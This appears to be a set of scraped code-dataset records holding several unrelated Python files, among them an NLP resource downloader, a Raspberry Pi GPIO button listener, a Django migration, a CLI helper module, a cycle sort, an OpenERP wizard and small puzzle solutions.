dest='download_srparser',\n action='store_false',\n help=\"Don't download Stanford Shift-Reduce Constituency Parser library.\"\n )\n # download_mongodb\n parser.add_argument(\n '--download_mongodb',\n default=True,\n dest='download_mongodb',\n action='store_true',\n help=\"Download MongoDB Java Driver.\"\n )\n # no_download_mongodb\n parser.add_argument(\n '--no_download_mongodb',\n dest='download_mongodb',\n action='store_false',\n help=\"Don't download MongoDB Java Driver.\"\n )\n # download_glove\n parser.add_argument(\n '--download_glove',\n default=True,\n dest='download_glove',\n action='store_true',\n help=\"Download Glove vectors.\"\n )\n # no_download_glove\n parser.add_argument(\n '--no_download_glove',\n dest='download_glove',\n action='store_false',\n help=\"Don't download Glove vectors.\"\n )\n # download_word2vec\n parser.add_argument(\n '--download_word2vec',\n default=True,\n dest='download_word2vec',\n action='store_true',\n help=\"Download Word2Vec vectors.\"\n )\n # no_download_word2vec\n parser.add_argument(\n '--no_download_word2vec',\n dest='download_word2vec',\n action='store_false',\n help=\"Don't download Word2Vec vectors.\"\n )\n # download_fasttext\n parser.add_argument(\n '--download_fasttext',\n default=True,\n dest='download_fasttext',\n action='store_true',\n help=\"Download Glove vectors.\"\n )\n # no_download_fasttext\n parser.add_argument(\n '--no_download_fasttext',\n dest='download_fasttext',\n action='store_false',\n help=\"Don't download Fasttext vectors.\"\n )\n args = parser.parse_args()\n\n return {\n 'download_corenlp': args.download_corenlp,\n 'download_srparser': args.download_srparser,\n 'download_mongodb': args.download_mongodb,\n 'download_glove': args.download_glove,\n 'download_word2vec': args.download_word2vec,\n 'download_fasttext': args.download_fasttext\n }\n\n\nif __name__ == '__main__':\n # Input parameters.\n input_params = get_input_params()\n\n base_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\n # Download and extract Stanford CoreNLP.\n stanford_dir = Path(ROOT_DIR) / 'lib' / 'stanford'\n if input_params['download_corenlp']:\n stanford_corenlp_latest_url = 'https://nlp.stanford.edu/software/stanford-corenlp-latest.zip'\n extracted_files = download_and_extract(url=stanford_corenlp_latest_url, local_dir=str(stanford_dir))\n\n stanford_corenlp_jar_name = extracted_files[0].split('/')[0] + '.jar'\n stanford_corenlp_models_jar_name = extracted_files[0].split('/')[0] + '-models.jar'\n stanford_corenlp_jar_path = Path(stanford_dir) / extracted_files[0] / stanford_corenlp_jar_name\n stanford_corenlp_models_jar_path = Path(stanford_dir) / extracted_files[0] / stanford_corenlp_models_jar_name\n\n # Copy corenlp JAR file to lib directory.\n if not os.path.exists(stanford_corenlp_jar_path):\n os.makedirs(stanford_corenlp_jar_path)\n shutil.copy(stanford_corenlp_jar_path, stanford_dir)\n\n # Copy corenlp-models JAR file to lib directory.\n if not os.path.exists(stanford_corenlp_models_jar_path):\n os.makedirs(stanford_corenlp_models_jar_path)\n shutil.copy(stanford_corenlp_models_jar_path, stanford_dir)\n\n # Remove extracted Stanford CoreNLP directory.\n shutil.rmtree(Path(stanford_dir) / extracted_files[0].split('/')[0])\n\n log.info(\n f\"Downloaded and extracted files: ['{stanford_corenlp_jar_path}', '{stanford_corenlp_models_jar_path}'].\")\n\n # Download Stanford Shift-Reduce Constituency Parser.\n if input_params['download_srparser']:\n stanford_srparser_url = 'https://nlp.stanford.edu/software/stanford-srparser-2014-10-23-models.jar'\n if not os.path.exists(stanford_dir):\n os.makedirs(stanford_dir)\n download(url=stanford_srparser_url, local_dir=str(stanford_dir))\n log.info(\n f\"Downloaded Stanford Shift-Reduce Constituency Parser library to '{stanford_dir}'.\")\n\n # MongoDB Java Driver.\n if input_params['download_mongodb']:\n mongodb_url = 'https://repo1.maven.org/maven2/org/mongodb/mongo-java-driver/3.12.7/mongo-java-driver-3.12.7.jar'\n mongodb_dir = Path(ROOT_DIR) / 'lib' / 'mongodb'\n if not os.path.exists(mongodb_dir):\n os.makedirs(mongodb_dir)\n download(url=mongodb_url, local_dir=str(mongodb_dir))\n log.info(\n f\"Downloaded MongoDB Java Driver to '{mongodb_dir}'.\")\n\n # Word emebeddings.\n for model_name in ['glove', 'word2vec', 'fasttext']:\n if input_params[f\"download_{model_name}\"]:\n local_dir = Path(ROOT_DIR) / os.environ['DATA_PATH'] / 'word_embeddings' / model_name\n if not os.path.exists(local_dir):\n os.makedirs(local_dir)\n vectors = download_gensim_vectors(model_name=model_name, local_dir=str(local_dir))\n","sub_path":"scripts/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"115926209","text":"#!/usr/bin/python\n# shutdown/reboot(/power on) Raspberry Pi with pushbutton\n\nimport RPi.GPIO as GPIO\n\nfrom datetime import datetime\nimport time\n\ndef set(value, default):\n return value if value else default\n\nclass GpioPinListener(): \n def __init__(self, pin, onButtonDown=None, onButtonUp=None, onLongPress=None, onShortPress=None, onFallingEdge=None, onRisingEdge=123,shutdown=2, debounce=0.01, pull_up_down=GPIO.PUD_UP, use_internal_pull=False):\n self.pin = pin\n noneLambda = lambda : None\n self.onButtonDown = set(onButtonDown, noneLambda)\n self.onButtonUp = set(onButtonUp, noneLambda)\n self.onLongPress = set(onLongPress, noneLambda)\n self.onShortPress = set(onShortPress, noneLambda)\n self.onFallingEdge = set(onFallingEdge, noneLambda)\n self.onRisingEdge = set(onRisingEdge, noneLambda)\n self.shutdown = shutdown\n self.debounce = debounce\n self.pull_up_down = pull_up_down\n self.buttonPressedTime = None\n self.elapsed = 0\n if use_internal_pull:\n GPIO.setup(pin, GPIO.IN, pull_up_down=pull_up_down)\n else:\n GPIO.setup(pin, GPIO.IN)\n \n GPIO.add_event_detect(pin, GPIO.BOTH, callback=self._buttonStateChanged) \n return\n \n \n def update(self):\n if self.buttonPressedTime is not None:\n self.elapsed = (datetime.now() - self.buttonPressedTime).total_seconds()\n if self.elapsed >= self.shutdown:\n self.elapsed = 0\n self.buttonPressedTime = None\n self.onLongPress()\n \n def _buttonStateChanged(self, pin):\n \n if not (GPIO.input(pin)):\n self._onFallingEdgeWrapper()\n else:\n self._onRisingEdgeWrapper()\n\n def _onFallingEdgeWrapper(self):\n if self.pull_up_down == GPIO.PUD_UP:\n self._onButtonDownWrapper()\n else:\n self._onButtonUpWrapper()\n \n def _onRisingEdgeWrapper(self):\n if self.pull_up_down == GPIO.PUD_UP:\n self._onButtonUpWrapper()\n else:\n self._onButtonDownWrapper()\n \n def _onButtonDownWrapper(self):\n self.onButtonDown()\n if self.buttonPressedTime is None:\n self.buttonPressedTime = datetime.now()\n \n def _onButtonUpWrapper(self):\n self.onButtonUp()\n if self.buttonPressedTime is not None:\n self.buttonPressedTime = None\n if self.elapsed >= self.shutdown:\n a = 10;\n elif self.elapsed >= self.debounce:\n # button pressed for a shorter time, reboot\n self.buttonPressedTime = None\n self.onShortPress() \n \n","sub_path":"gpioPinListener.py","file_name":"gpioPinListener.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"214012605","text":"##########################################################\n# H E A D E R \n##########################################################\n# Name : Ranges\n# Purpose: Produce dataframe of ranges over periods, i.e.\n# average range of all available months for all\n# available years \n# Author : Steve Armstrong\n \n##########################################################\n# I M P O R T S\n##########################################################\n\nimport sys\nimport calendar as cal\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\nfrom itertools import product\nimport decimal\n\n##########################################################\n# M A I N \n########################################################## \n\ndef ranges(df): \n # Calculate number of decimal places\n times_by = len(str(df[''][0]).split('.')[-1])\n # JPY symbols sometimes have only 1, make it 2 in-line with rest\n if times_by == 1: times_by += 1\n # Get 10 to the power of number of decimals to get proportiante \n # number to times by to get real number (i.e. integer)\n times_by = 10**times_by\n \n # Get number of available years\n first_year = df.head(1).index.year[0]\n last_year = df.tail(1).index.year[0]\n \n # Make 2d array of 0's to populate dataframe\n # Use last year+1 as range does not use the upper end\n z = np.zeros(shape=[len(range(first_year, last_year+1)), 12])\n # Use range 1,13 for months as range does not use upper end, same for years\n out_df = pd.DataFrame(z, columns=range(1, 13), index=range(first_year, last_year+1))\n \n # For each year in dataframe\n for year in out_df.index.values:\n \n # For each month in dataframe\n for month in out_df.columns.values:\n total_range = 0\n count = 0\n \n # Get max day of given month for given year\n max_day = cal.monthrange(year, month)[1]\n # Make a temporary dataframe of current month for iteration\n tmp_df = df.ix[dt.date(year, month, 1):dt.date(year, month, max_day)]\n if len(tmp_df) == 0: break\n \n # Calculate range for each given day\n for i in range(0, len(tmp_df)):\n total_range += tmp_df[''][i] - tmp_df[''][i]\n count += 1\n \n # Work out average based on total / num of days \n out_df[month][year] = round((total_range / count) * times_by, 0)\n \n return out_df\n \n","sub_path":"func/ranges.py","file_name":"ranges.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"100164155","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Badge',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('title', models.CharField(max_length=30)),\n ('description', models.CharField(max_length=80)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserBadge',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('earn_date', models.DateField(auto_now_add=True)),\n ('badge', models.ForeignKey(to='badges.Badge')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='userbadge',\n unique_together=set([('user', 'badge')]),\n ),\n ]\n","sub_path":"badges/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"517763001","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport typer\nimport sys\nimport time\nfrom typing import Dict, List, Literal, Union\nfrom pathlib import Path\n\n\n# Detect if called from pypi installed package or via cloned github repo (development)\ntry:\n from centralcli import config, log, utils, Cache, Response\nexcept (ImportError, ModuleNotFoundError) as e:\n pkg_dir = Path(__file__).absolute().parent\n if pkg_dir.name == \"centralcli\":\n sys.path.insert(0, str(pkg_dir.parent))\n from centralcli import config, log, utils, Cache, Response\n else:\n print(pkg_dir.parts)\n raise e\n\nfrom centralcli.central import CentralApi\n\n\ntty = utils.tty\nCASE_SENSITIVE_TOKENS = [\"R\", \"U\"]\nFormatType = Literal[\"json\", \"yaml\", \"csv\", \"rich\", \"simple\"]\nMsgType = Literal[\"initial\", \"previous\", \"forgot\", \"will_forget\", \"previous_will_forget\"]\n\n\nclass CLICommon:\n def __init__(self, account: str = \"default\", cache: Cache = None, central: CentralApi = None):\n self.account = account\n self.cache = cache\n self.central = central\n\n class AcctMsg:\n def __init__(self, account: str = None, msg: MsgType = None) -> None:\n self.account = account\n self.msg = msg\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n if self.msg and hasattr(self, self.msg):\n return getattr(self, self.msg)\n else:\n return self.initial\n\n @property\n def initial(self):\n acct_clr = f\"{typer.style(self.account, fg='cyan')}\"\n return (\n f\"{typer.style(f'Using Account: {acct_clr}.', fg='magenta')} \"\n f\"{typer.style(f'Account setting is sticky. ', fg='red', blink=True)}\"\n f\"\\n {acct_clr} {typer.style(f'will be used for subsequent commands until', fg='magenta')}\"\n f\"\\n {typer.style('--account or `-d` (revert to default). is used.', fg='magenta')}\"\n )\n\n @property\n def previous(self):\n return (\n f\"{typer.style(f'Using previously specified account: ', fg='magenta')}\"\n f\"{typer.style(self.account, fg='cyan', blink=True)}. \"\n f\"\\n{typer.style('Use `--account ` to switch to another account.', fg='magenta')}\"\n f\"\\n{typer.style(' or `-d` flag to revert to default account.', fg='magenta')}\"\n )\n\n @property\n def forgot(self):\n return typer.style(\n \"Forget option set for account, and expiration has passed. reverting to default account\", fg=\"magenta\"\n )\n\n @property\n def will_forget(self):\n return typer.style(\n f\"Forget options is configured, will revert to default account \"\n f'{typer.style(f\"{config.forget_account_after} mins\", fg=\"cyan\")}'\n f'{typer.style(\" after last command.\", fg=\"magenta\")}',\n fg=\"magenta\",\n )\n\n @property\n def previous_will_forget(self):\n return f\"{self.previous}\\n\\n{self.will_forget}\"\n\n def account_name_callback(self, ctx: typer.Context, account: str):\n if ctx.resilient_parsing: # tab completion, return without validating\n return account\n\n # -- // sticky last account messaging account is loaded in __init__ \\\\ --\n if account in [\"central_info\", \"default\"]:\n if config.sticky_account_file.is_file():\n last_account, last_cmd_ts = config.sticky_account_file.read_text().split(\"\\n\")\n last_cmd_ts = float(last_cmd_ts)\n\n # last account messaging\n if config.forget:\n if time.time() > last_cmd_ts + (config.forget * 60):\n # config.sticky_account_file.unlink(missing_ok=True)\n typer.echo(self.AcctMsg(msg=\"forgot\"))\n else:\n account = last_account\n typer.echo(self.AcctMsg(account, msg=\"previous_will_forget\"))\n else:\n account = last_account\n typer.echo(self.AcctMsg(account, msg=\"previous\"))\n else:\n if account in config.data:\n # config.sticky_account_file.parent.mkdir(exist_ok=True)\n # config.sticky_account_file.write_text(f\"{account}\\n{round(time.time(), 2)}\")\n typer.echo(self.AcctMsg(account))\n\n if config.valid:\n # config.account = self.account = account\n # self.central = CentralApi(account)\n # self.cache = Cache(self.central)\n return account\n else:\n typer.echo(\n f\"{typer.style('ERROR:', fg=typer.colors.RED)} \"\n f\"The specified account: '{config.account}' is not defined in the config @\\n\"\n f\"{config.file}\\n\\n\"\n )\n\n if config.defined_accounts:\n typer.echo(\n f\"The following accounts are defined {', '.join(config.defined_accounts)}\\n\"\n f\"The default account 'central_info' is used if no account is specified via --account flag.\\n\"\n f\"or the ARUBACLI_ACCOUNT environment variable.\\n\"\n )\n else:\n if not config.data:\n # TODO prompt user for details\n typer.secho(\"Configuration doesn't exist\", fg=\"red\")\n else:\n typer.secho(\"No accounts defined in config\", fg=\"red\")\n\n if account not in [\"central_info\", \"default\"]:\n if \"central_info\" not in config.data and \"default\" not in config.data:\n typer.echo(\n f\"{typer.style('WARNING:', fg='yellow')} \"\n f\"'central_info' is not defined in the config. This is the default when not overriden by\\n\"\n f\"--account parameter or ARUBACLI_ACCOUNT environment variable.\"\n )\n\n raise typer.Exit(code=1)\n\n @staticmethod\n def default_callback(ctx: typer.Context, default: bool):\n if ctx.resilient_parsing: # tab completion, return without validating\n return\n\n if default and config.sticky_account_file.is_file():\n typer.secho(\"Using default central account\", fg=\"bright_green\")\n config.sticky_account_file.unlink()\n return default\n\n @staticmethod\n def debug_callback(ctx: typer.Context, debug: bool):\n if ctx.resilient_parsing: # tab completion, return without validating\n return False\n\n if debug:\n log.DEBUG = config.debug = debug\n return debug\n\n # not used at the moment but could be used to allow unambiguous partial tokens\n @staticmethod\n def normalize_tokens(token: str) -> str:\n return token.lower() if token not in CASE_SENSITIVE_TOKENS else token\n\n def dev_completion(\n self,\n ctx: typer.Context,\n args: List[str],\n incomplete: str,\n ) -> str:\n # devs = cli.cache.devices\n # _completion = [dev[\"name\"] for dev in devs if incomplete.lower() in dev[\"name\"].lower()]\n # _completion += [dev[\"serial\"] for dev in devs if incomplete.lower() in dev[\"serial\"].lower()]\n # _completion += [dev[\"mac\"] for dev in devs if utils.Mac(incomplete).cols.lower() in dev[\"mac\"].lower()]\n # print(args)\n # [\"site\", \"group\"]\n # return [k for k in [*_completion, \"site\", \"group\"] if incomplete in k]\n return self.cache.completion(incomplete, cache=\"dev\")\n\n @staticmethod\n def get_format(\n do_json: bool = False, do_yaml: bool = False, do_csv: bool = False, do_table: bool = False, default: str = \"rich\"\n ) -> FormatType:\n \"\"\"Simple helper method to return the selected output format type (str)\"\"\"\n if do_json:\n return \"json\"\n elif do_yaml:\n return \"yaml\"\n elif do_csv:\n return \"csv\"\n elif do_table:\n return \"rich\" if default != \"rich\" else \"tabulate\"\n else:\n return default\n\n @staticmethod\n def _display_results(\n data: Union[List[dict], List[str], None] = None,\n tablefmt: str = \"rich\",\n title: str = None,\n caption: str = None,\n pager: bool = True,\n outfile: Path = None,\n sort_by: str = None,\n reverse: bool = False,\n pad: int = None,\n cleaner: callable = None,\n **cleaner_kwargs,\n ):\n if data:\n data = utils.listify(data)\n\n if cleaner:\n data = cleaner(data, **cleaner_kwargs)\n\n if sort_by and all(isinstance(d, dict) for d in data):\n if not all([True if sort_by in d else False for d in data]):\n typer.echo(f\"Invalid dataset for {sort_by} not all entries contain a {sort_by} key\")\n typer.secho(\"sort by is not implemented for all commands yet\", fg=\"red\")\n else:\n data = sorted(data, key=lambda d: d[sort_by])\n\n if reverse:\n data = data[::-1]\n\n outdata = utils.output(\n data,\n tablefmt,\n title=title,\n caption=caption,\n account=None if config.account in [\"central_info\", \"account\"] else config.account,\n config=config,\n )\n typer.echo_via_pager(outdata) if pager and tty and len(outdata) > tty.rows else typer.echo(outdata)\n\n # -- // Output to file \\\\ --\n if outfile and outdata:\n if Path().cwd() != Path.joinpath(config.outdir / outfile):\n if Path.joinpath(outfile.parent.resolve() / \".git\").is_dir():\n typer.secho(\n \"It looks like you are in the root of a git repo dir.\\n\"\n \"Exporting to out subdir.\"\n )\n config.outdir.mkdir(exist_ok=True)\n outfile = config.outdir / outfile\n\n print(typer.style(f\"\\nWriting output to {outfile}... \", fg=\"cyan\"), end=\"\")\n outfile.write_text(outdata.file) # typer.unstyle(outdata) also works\n typer.secho(\"Done\", fg=\"green\")\n\n def display_results(\n self,\n resp: Union[Response, List[Response]] = None,\n data: Union[List[dict], List[str], None] = None,\n tablefmt: str = \"rich\",\n title: str = None,\n caption: str = None,\n pager: bool = True,\n outfile: Path = None,\n sort_by: str = None,\n reverse: bool = None,\n pad: int = None,\n exit_on_fail: bool = False,\n ok_status: Union[int, List[int], Dict[int, str]] = None,\n cleaner: callable = None,\n **cleaner_kwargs,\n ) -> None:\n \"\"\"Output Formatted API Response to display and optionally to file\n\n one of resp or data attribute is required\n\n Args:\n resp (Union[Response, List[Response], None], optional): API Response objects.\n data (Union[List[dict], List[str], None], optional): API Response output data.\n tablefmt (str, optional): Format of output. Defaults to \"rich\" (tabular).\n title: (str, optional): Title of output table.\n Only applies to \"rich\" tablefmt. Defaults to None.\n caption: (str, optional): Caption displayed at bottome of table.\n Only applies to \"rich\" tablefmt. Defaults to None.\n pager (bool, optional): Page Output / or not. Defaults to True.\n outfile (Path, optional): path/file of output file. Defaults to None.\n sort_by (Union[str, List[str], None] optional): column or columns to sort output on.\n reverse (bool, optional): reverse the output.\n ok_status (Union[int, List[int], Tuple[int, str], List[Tuple[int, str]]], optional): By default\n responses with status_code 2xx are considered OK and are rendered as green by\n Output class. provide int or list of int to override additional status_codes that\n should also be rendered as success/green. provide a dict with {int: str, ...}\n where string can be any color supported by Output class or \"neutral\" \"success\" \"fail\"\n where neutral is no formatting, and success / fail will use the default green / red respectively.\n cleaner (callable, optional): The Cleaner function to use.\n \"\"\"\n # TODO remove ok_status, and handle in CentralAPI method (set resp.ok = True)\n if pad:\n log.warning(\"Depricated pad parameter referenced in display_results\")\n\n pager = False if config.no_pager else pager\n\n if resp is not None:\n resp = utils.listify(resp)\n\n # data = []\n for idx, r in enumerate(resp):\n if len(resp) > 1:\n _url = r.url if not hasattr(r.url, \"path\") else r.url.path\n typer.secho(f\"Request {idx + 1} [{r.method}: {_url}] Response:\", fg=\"cyan\")\n if not r or tablefmt == \"action\":\n fg = \"green\" if r else \"red\"\n\n typer.secho(str(r), fg=fg)\n if not r and exit_on_fail:\n raise typer.Exit(1)\n else:\n if r.rl:\n rl_str = f\"[italic dark_olive_green2]{r.rl}\".lstrip()\n caption = f\"{caption} {rl_str}\" if caption else rl_str\n self._display_results(\n r.output,\n tablefmt=tablefmt,\n title=title,\n caption=caption,\n pager=pager,\n outfile=outfile,\n sort_by=sort_by,\n reverse=reverse,\n pad=pad,\n cleaner=cleaner,\n **cleaner_kwargs\n )\n\n elif data:\n self._display_results(\n data,\n tablefmt=tablefmt,\n title=title,\n caption=caption,\n pager=pager,\n outfile=outfile,\n sort_by=sort_by,\n reverse=reverse,\n pad=pad,\n cleaner=cleaner,\n **cleaner_kwargs\n )\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"centralcli/clicommon.py","file_name":"clicommon.py","file_ext":"py","file_size_in_byte":14653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"639582704","text":"def sort(array, key=lambda x: x, reverse=False):\n '''Cycle sort is an in-place, unstable sorting algorithm, a comparison sort\n that is theoretically optimal in terms of the total number of writes to the\n original array, unlike any other in-place sorting algorithm.\n\n Running time: O(n^2).\n '''\n if len(array) <= 1:\n return array\n\n # see: http://en.wikipedia.org/wiki/Cycle_sort\n for start in range(len(array) - 1):\n item = array[start]\n pos = start\n\n # find out where to put the item,\n # i.e, how many elements are smaller than it\n pos += sum([key(x) < key(item) for x in array[start + 1:]])\n\n # we're at the good place\n if pos == start:\n continue\n\n # put the item after any duplicates\n while key(item) == key(array[pos]):\n pos += 1\n array[pos], item = item, array[pos]\n\n # rotate the rest of the cycle\n while pos != start:\n pos = start + sum([key(x) < key(item) for x in array[start + 1:]])\n\n while key(item) == key(array[pos]):\n pos += 1\n array[pos], item = item, array[pos]\n\n return array[::-1] if reverse else array\n","sub_path":"order/cyclesort.py","file_name":"cyclesort.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"423431451","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\n\n\nclass duplicate_sale_order_line_wizard(osv.osv_memory):\n \"\"\" duplicate_sale_order_line_wizard \"\"\"\n\n _name = \"duplicate.sale.order.line.wizard\"\n _description = \"duplicate Sale Order\"\n\n _columns = {\n 'extend_so_id': fields.many2one('sale.order', 'Sale Order', required=True, domain=[('state','=','draft')]),\n 'extends_id': fields.many2one('sale.extends','Project Detail',required=True,)\n }\n _defaults = {\n \n }\n\n def make_duplicate_so(self, cr, uid, ids, context=None):\n line_obj = self.pool.get('sale.order.line')\n sale_obj = self.pool.get('sale.order')\n extend_obj = self.pool.get('sale.extends')\n line_ids = context.get('active_ids', False)\n data = self.browse(cr, uid, ids[0], context=context)\n# order = sale_obj.browse(cr, uid, [data.extend_so_id.id], context=context)[0]\n# if line_ids:\n# for line in line_ids:\n# default_val = {}\n# copy_id = line_obj.copy(cr, uid, line, default_val)\n# line_obj.write(cr, uid, [copy_id], {'order_id':order.id}, context)\n# return True\n extend_obj_browse = extend_obj.browse(cr, uid, [data.extends_id.id], context=context)[0]\n code = extend_obj_browse.code\n task_desc = extend_obj_browse.task_desc\n analytic_account = extend_obj_browse.analytic_account_id.id\n project_qty = extend_obj_browse.prod_qty\n order = sale_obj.browse(cr, uid, [data.extend_so_id.id], context=context)[0]\n if line_ids:\n for line in line_ids:\n default_val = {'project_code':code} # 'default_constraint':False\n copy_id = line_obj.copy(cr, uid, line, default_val)\n #line_obj.write(cr, uid, [copy_id], {'extend_ids': [(6,0, [data.extends_id.id])],'project_code':code, 'extend_id':data.extends_id.id, 'project_desc':task_desc,'analytic_account_id': analytic_account, 'project_qty': project_qty, 'order_id':order.id}, context)\n cr.execute('UPDATE sale_order_line SET project_code=%s, extend_id=%s, project_desc=%s, analytic_account_id=%s, project_qty=%s, order_id=%s WHERE id=%s',(code, data.extends_id.id, task_desc, analytic_account, project_qty, order.id, copy_id))\n line_obj.write(cr, uid, [copy_id], {'extend_ids': [(6,0, [data.extends_id.id])], 'order_id':order.id}, context)\n sale_obj.write(cr, uid, [order.id], {'calculated': True}, context=context) \n return True\n\n\nduplicate_sale_order_line_wizard()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n","sub_path":"improve_spreadsheet/wizard/duplicate_sale_order_line_wizard.py","file_name":"duplicate_sale_order_line_wizard.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"214266203","text":"n, k = map(int, input().split())\r\n# n - 1 with gcd > 1 because any number gcd with itself is > 1\r\narray = [0] + [i+1 for i in range(n)]\r\n# print(*array[1:])\r\nif n == k:\r\n print(-1)\r\nelse:\r\n for i in range(0, n-k-1):\r\n \t# All consecutive numbers are coprimes, every swap removes a coprime\r\n array[1], array[n-i] = array[n-i],array[1]\r\n # print(*array[1:])\r\n print(*array[1:])\r\n\r\n\r\n\r\n# def farey(limit):\r\n# '''Fast computation of Farey sequence as a generator'''\r\n# # n, d is the start fraction n/d (0,1) initially \r\n# # N, D is the stop fraction N/D (1,1) initially \r\n# pend = []\r\n# n = 0\r\n# d = N = D = 1\r\n# while True:\r\n# mediant_d = d + D\r\n# if mediant_d <= limit:\r\n# mediant_n = n + N\r\n# pend.append((mediant_n, mediant_d, N, D))\r\n# N = mediant_n\r\n# D = mediant_d\r\n# else:\r\n# yield n, d\r\n# if pend:\r\n# n, d, N, D = pend.pop()\r\n# else:\r\n# break","sub_path":"Problems/10/361B.py","file_name":"361B.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"204116114","text":"import sys\nimport copy\n\nsys.stdin = open(\"input.txt\", \"r\")\n\nboard = [[int(i) for i in sys.stdin.readline().rstrip().split()] for j in range(10)]\n\nList = []\n\npre_lst = {1:[],2:[],3:[],4:[],5:[]}\n\nlst_check = dict()\n\nlast_check = []\n\nfirst =[(0,0)]\nsecond = [(0,0),(0,1),(1,0),(1,1)]\nthird = [(0,0),(0,1),(0,2),(1,0),(1,1),(1,2),(2,0),(2,1),(2,2)]\nfourth = [(0,0),(0,1),(0,2),(0,3),(1,0),(1,1),(1,2),(1,3),(2,0),(2,1),(2,2),(2,3),(3,0),(3,1),(3,2),(3,3)]\nfifth = [(0,0),(0,1),(0,2),(0,3),(0,4),(1,0),(1,1),(1,2),(1,3),(1,4),(2,0),(2,1),(2,2),(2,3),(2,4),\n (3,0),(3,1),(3,2),(3,3),(3,4),(4,0),(4,1),(4,2),(4,3),(4,4)]\n\ndef inRange(a,b):\n if (0<=a<10) and (0<=b<10):\n return True\n return False\n\ndef check(second,cur):\n ans = []\n for i,j in second:\n curPos = (cur[0] + i, cur[1] + j)\n ans.append(curPos)\n if inRange(curPos[0], curPos[1]) == False or (board[curPos[0]][curPos[1]] != 1):\n return (False, [])\n return (True, tuple(ans))\n\nfor i in range(10):\n for j in range(10):\n cur = (i,j)\n a = check(first,cur)\n if a[0]:\n pre_lst[1].append(a[1])\n lst_check[a[1]] = 1\n last_check.append(cur)\n b = check(second, cur)\n if b[0]:\n pre_lst[2].append(b[1])\n lst_check[b[1]] = 2\n c = check(third, cur)\n if c[0]:\n pre_lst[3].append(c[1])\n lst_check[c[1]] = 3\n d = check(fourth, cur)\n if d[0]:\n pre_lst[4].append(d[1])\n lst_check[d[1]] = 4\n e = check(fifth, cur)\n if e[0]:\n pre_lst[5].append(e[1])\n lst_check[e[1]] = 5\n\nfor i in range(5,0,-1):\n x = pre_lst[i]\n for j in x:\n List.append(j)\n\n\nindex = 0\n\nmin_color = 10000\n\nnum = 0\ndef visit_check(cur):\n for i,j in cur:\n if visit[i][j] == 1:\n return False\n return True\n\n\nmax_index = len(List)\n\ndef finish_check(visit__):\n for i,j in last_check:\n if visit__[i][j] != 1:\n return False\n return True\n\n\ndef pick(n, ans_list, index):\n\n if len(ans_list) == n:\n if finish_check(visit):\n final_list.append(copy.deepcopy(ans_list))\n return\n\n if index == len(List):\n return\n\n cur = List[index]\n if visit_check(cur):\n for i, j in cur:\n visit[i][j] = 1\n ans_list.append(cur)\n pick(n,ans_list,index+1)\n ans_list.pop()\n for i, j in cur:\n visit[i][j] = 0\n\n pick(n,ans_list,index+1)\n\nn = 0\nstop = False\nAns = 10000\n\nwhile n < (len(List)+1):\n n += 1\n final_list = []\n ans_list = []\n visit = [[0 for i in range(10)] for j in range(10)]\n pick(n,ans_list,0)\n print(len(final_list))\n\n for ans in final_list:\n visit_2 = [[0 for i in range(10)] for j in range(10)]\n color = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0}\n for cur in ans:\n cur_color_num = lst_check[cur]\n\n if color[cur_color_num] < 5:\n for i, j in cur:\n visit_2[i][j] = 1\n color[cur_color_num] += 1\n else:\n break\n if finish_check(visit_2):\n Ans = n\n stop = True\n break\n if stop:\n break\n\n\n\"\"\"\ndef dfs(index,count):\n global min_color, max_index, num\n\n if finish_check():\n\n if count < min_color:\n min_color = count\n return\n\n if count == (min_color-1):\n return\n\n if index >= max_index:\n return\n\n cur = List[index]\n\n cur_color_num = lst_check[cur]\n\n if color[cur_color_num] < 5:\n if visit_check(cur):\n for i,j in cur:\n 